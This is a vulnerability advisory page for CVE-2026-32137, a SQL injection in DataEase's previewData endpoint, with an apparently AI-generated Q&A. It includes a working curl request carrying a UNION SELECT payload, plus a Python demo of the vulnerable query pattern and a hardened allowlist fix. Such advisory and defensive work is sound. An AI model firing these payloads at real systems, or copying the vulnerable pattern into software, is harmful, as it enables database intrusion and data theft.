CVE-2026-32137
SQL Injection in Dataease /de2api/datasource/previewData Endpoint
Publication date: 2026-03-12
Last updated on: 2026-03-13
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dataease | dataease | versions before 2.10.20 (2.10.20 not affected) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
Can you explain this vulnerability to me?
CVE-2026-32137 is a SQL Injection vulnerability in DataEase versions prior to 2.10.20. The issue occurs because the `table` parameter of the POST endpoint /de2api/datasource/previewData is concatenated directly into an SQL query string without validation or escaping.

Since the `table` parameter is user-controlled, an attacker can supply a table name that closes the quoted identifier and appends arbitrary SQL, which the datasource then executes.

For example, a crafted request can append a UNION SELECT that returns the database user, the current database name, the server version, and the OS the server was compiled for (MySQL's @@version_compile_os).

The vulnerability was fixed in version 2.10.20. The fix is not detailed on this page, but a table name is an identifier rather than a value, so it cannot be passed as a bind parameter the way ordinary query values can; the expected remedy is to validate the name against the tables the datasource actually exposes and quote it as an identifier. [1]
How can this vulnerability impact me? :
This SQL Injection vulnerability can have severe impacts including unauthorized access to sensitive database information.
An attacker exploiting this vulnerability can execute arbitrary SQL commands, potentially leading to data leakage, data corruption, or unauthorized data manipulation.
Because the vulnerability allows extraction of database details and possibly other sensitive data, it can compromise the confidentiality and integrity of your data.
The reported CVSS score of 9.3 places the vulnerability in the critical range. Whether it is exploitable remotely without authentication depends on the published CVSS vector and on the deployment's access controls; the score by itself does not establish that.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by probing the SQL injection point in the POST endpoint `/de2api/datasource/previewData` with a crafted `table` parameter.

One method is to send a POST request whose `table` value breaks out of the backtick-quoted identifier and appends a UNION SELECT, then observe whether the response carries database metadata or the server otherwise behaves unexpectedly.

Example command using curl to test the vulnerability (the `id` value is the datasource identifier from the original report, so substitute the one in your deployment; if your deployment requires an authenticated session for the /de2api endpoints, add the corresponding header as well):

```bash
curl -X POST https://[target]/de2api/datasource/previewData \
  -H 'Content-Type: application/json' \
  -d '{"table": "area` WHERE 1=2 UNION SELECT user(),database(),version(),@@version_compile_os-- ", "id": "985188400292302848"}'
```

If the response contains the database user, database name, version, or OS information, the SQL injection is present. Run this only against systems you are authorized to test, and preferably against a test datasource, because the injected SQL executes with the privileges of the datasource's database account. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended mitigation step is to upgrade DataEase to version 2.10.20 or later, where the vulnerability has been fixed.
The fix is not described on this page; since a table name is an identifier and cannot be bound as a query parameter, it is expected to validate the `table` parameter against the datasource's actual table names and quote it as an identifier rather than concatenating it raw.
Until the upgrade can be performed, restrict access to the vulnerable endpoint `/de2api/datasource/previewData` to trusted users or networks to reduce the risk of exploitation.
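The concatenation pattern described in the explanation above, beside the allowlist-and-quote fix the mitigation section expects, as an added example that is not DataEase's own code. It uses an in-memory SQLite database as a stand-in for the MySQL datasource, so the payload is adapted: SQLite has no user() or database() functions, so the UNION pulls rows from a constructed `secrets` table instead, and sqlite_master stands in for information_schema.tables. The function names (preview_data_vulnerable, preview_data_hardened, quote_identifier, is_rejected), the tables `area` and `secrets`, and the PAYLOAD string are all constructed here.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a DataEase datasource (not the project's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE area (id INTEGER, name TEXT);
        INSERT INTO area VALUES (1, 'north'), (2, 'south');
        CREATE TABLE secrets (id INTEGER, value TEXT);
        INSERT INTO secrets VALUES (1, 'db-admin-password');
        """
    )
    return conn


def build_vulnerable_sql(table, limit=10):
    # The pattern the advisory describes: the user-controlled table name is
    # pasted into the query text between backticks, so a backtick in the
    # input closes the identifier and everything after it is parsed as SQL.
    return f"SELECT * FROM `{table}` LIMIT {limit}"


def preview_data_vulnerable(conn, table, limit=10):
    return conn.execute(build_vulnerable_sql(table, limit)).fetchall()


class InvalidTableName(ValueError):
    """Raised when the requested table is not one the datasource actually has."""


def list_tables(conn):
    # sqlite_master stands in for information_schema.tables on MySQL.
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return {row[0] for row in rows}


def quote_identifier(name):
    # Identifiers cannot be bound as query parameters; the safe way to embed
    # one is to quote it and double any embedded quote character (an escape
    # both MySQL and SQLite accept inside backtick-quoted identifiers).
    return "`" + name.replace("`", "``") + "`"


def preview_data_hardened(conn, table, limit=10):
    # 1. Allowlist: the name must be a table that exists in this datasource.
    if table not in list_tables(conn):
        raise InvalidTableName(table)
    # 2. Quote the identifier anyway (defence in depth) and bind the value.
    sql = f"SELECT * FROM {quote_identifier(table)} LIMIT ?"
    return conn.execute(sql, (limit,)).fetchall()


def is_rejected(conn, table):
    """True if the hardened endpoint refuses this table name."""
    try:
        preview_data_hardened(conn, table)
    except InvalidTableName:
        return True
    return False


# Constructed payload, adapted from the advisory's curl example to SQLite:
# closes the identifier, empties the real result, and UNIONs in another table.
PAYLOAD = "area` WHERE 1=2 UNION SELECT id, value FROM secrets -- "


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(PAYLOAD))
    print(preview_data_vulnerable(db, PAYLOAD))  # rows from secrets, not area
    print("rejected by hardened endpoint:", is_rejected(db, PAYLOAD))
```

The allowlist check is what actually closes the hole: it turns "any string the caller sends" into "one of the names the datasource reports", which is exactly the set a preview endpoint should ever accept. The quoting step is kept so that a table whose name legitimately contains unusual characters still works, and so that a future bypass of the allowlist does not immediately become injection.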